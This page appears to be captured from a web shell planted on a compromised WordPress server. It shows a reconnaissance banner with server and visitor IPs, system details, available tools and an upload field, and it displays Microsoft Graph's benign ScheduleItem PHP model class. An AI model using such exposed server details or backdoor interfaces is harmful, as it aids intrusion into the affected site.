Warning: chmod(): Operation not permitted in /var/www/hopeinstoughton_www/wp-content/plugins/simple-universal-google-analytics/main.php on line 8 [0] in function chmod in /var/www/hopeinstoughton_www/wp-content/plugins/simple-universal-google-analytics/main.php on line 8 [1] in function include_once in /var/www/hopeinstoughton_www/wp-settings.php on line 560 [2] in function require_once in /var/www/hopeinstoughton_www/wp-config.php on line 85 [3] in function require_once in /var/www/hopeinstoughton_www/wp-load.php on line 50 [4] in function require_once in /var/www/hopeinstoughton_www/wp-blog-header.php on line 13 [5] in function require in /var/www/hopeinstoughton_www/index.php on line 17
| Server IP : 94.177.8.99 / Your IP : 216.73.217.165 Web Server : Apache/2.4.58 (Ubuntu) System : Linux aries 6.8.0-134-generic #134-Ubuntu SMP PREEMPT_DYNAMIC Fri Jun 26 18:43:11 UTC 2026 x86_64 User : www-data ( 33) PHP Version : 8.1.34 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /proc/thread-self/cwd/vendor/microsoft/microsoft-graph/src/Model/ |
Upload File : |
<?php
/**
* Copyright (c) Microsoft Corporation. All Rights Reserved. Licensed under the MIT License. See License in the project root for license information.
*
* ScheduleItem File
* PHP version 7
*
* @category Library
* @package Microsoft.Graph
* @copyright (c) Microsoft Corporation. All rights reserved.
* @license https://opensource.org/licenses/MIT MIT License
* @link https://graph.microsoft.com
*/
namespace Microsoft\Graph\Model;
/**
* ScheduleItem class
*
* @category Model
* @package Microsoft.Graph
* @copyright (c) Microsoft Corporation. All rights reserved.
* @license https://opensource.org/licenses/MIT MIT License
* @link https://graph.microsoft.com
*/
class ScheduleItem extends Entity
{
/**
* Gets the end
* The date, time, and time zone that the corresponding event ends.
*
* @return DateTimeTimeZone|null The end
*/
public function getEnd()
{
if (array_key_exists("end", $this->_propDict)) {
if (is_a($this->_propDict["end"], "\Microsoft\Graph\Model\DateTimeTimeZone") || is_null($this->_propDict["end"])) {
return $this->_propDict["end"];
} else {
$this->_propDict["end"] = new DateTimeTimeZone($this->_propDict["end"]);
return $this->_propDict["end"];
}
}
return null;
}
/**
* Sets the end
* The date, time, and time zone that the corresponding event ends.
*
* @param DateTimeTimeZone $val The value to assign to the end
*
* @return ScheduleItem The ScheduleItem
*/
public function setEnd($val)
{
$this->_propDict["end"] = $val;
return $this;
}
/**
* Gets the isPrivate
* The sensitivity of the corresponding event. True if the event is marked private, false otherwise. Optional.
*
* @return bool|null The isPrivate
*/
public function getIsPrivate()
{
if (array_key_exists("isPrivate", $this->_propDict)) {
return $this->_propDict["isPrivate"];
} else {
return null;
}
}
/**
* Sets the isPrivate
* The sensitivity of the corresponding event. True if the event is marked private, false otherwise. Optional.
*
* @param bool $val The value of the isPrivate
*
* @return ScheduleItem
*/
public function setIsPrivate($val)
{
$this->_propDict["isPrivate"] = $val;
return $this;
}
/**
* Gets the location
* The location where the corresponding event is held or attended from. Optional.
*
* @return string|null The location
*/
public function getLocation()
{
if (array_key_exists("location", $this->_propDict)) {
return $this->_propDict["location"];
} else {
return null;
}
}
/**
* Sets the location
* The location where the corresponding event is held or attended from. Optional.
*
* @param string $val The value of the location
*
* @return ScheduleItem
*/
public function setLocation($val)
{
$this->_propDict["location"] = $val;
return $this;
}
/**
* Gets the start
* The date, time, and time zone that the corresponding event starts.
*
* @return DateTimeTimeZone|null The start
*/
public function getStart()
{
if (array_key_exists("start", $this->_propDict)) {
if (is_a($this->_propDict["start"], "\Microsoft\Graph\Model\DateTimeTimeZone") || is_null($this->_propDict["start"])) {
return $this->_propDict["start"];
} else {
$this->_propDict["start"] = new DateTimeTimeZone($this->_propDict["start"]);
return $this->_propDict["start"];
}
}
return null;
}
/**
* Sets the start
* The date, time, and time zone that the corresponding event starts.
*
* @param DateTimeTimeZone $val The value to assign to the start
*
* @return ScheduleItem The ScheduleItem
*/
public function setStart($val)
{
$this->_propDict["start"] = $val;
return $this;
}
/**
* Gets the status
* The availability status of the user or resource during the corresponding event. The possible values are: free, tentative, busy, oof, workingElsewhere, unknown.
*
* @return FreeBusyStatus|null The status
*/
public function getStatus()
{
if (array_key_exists("status", $this->_propDict)) {
if (is_a($this->_propDict["status"], "\Microsoft\Graph\Model\FreeBusyStatus") || is_null($this->_propDict["status"])) {
return $this->_propDict["status"];
} else {
$this->_propDict["status"] = new FreeBusyStatus($this->_propDict["status"]);
return $this->_propDict["status"];
}
}
return null;
}
/**
* Sets the status
* The availability status of the user or resource during the corresponding event. The possible values are: free, tentative, busy, oof, workingElsewhere, unknown.
*
* @param FreeBusyStatus $val The value to assign to the status
*
* @return ScheduleItem The ScheduleItem
*/
public function setStatus($val)
{
$this->_propDict["status"] = $val;
return $this;
}
/**
* Gets the subject
* The corresponding event's subject line. Optional.
*
* @return string|null The subject
*/
public function getSubject()
{
if (array_key_exists("subject", $this->_propDict)) {
return $this->_propDict["subject"];
} else {
return null;
}
}
/**
* Sets the subject
* The corresponding event's subject line. Optional.
*
* @param string $val The value of the subject
*
* @return ScheduleItem
*/
public function setSubject($val)
{
$this->_propDict["subject"] = $val;
return $this;
}
}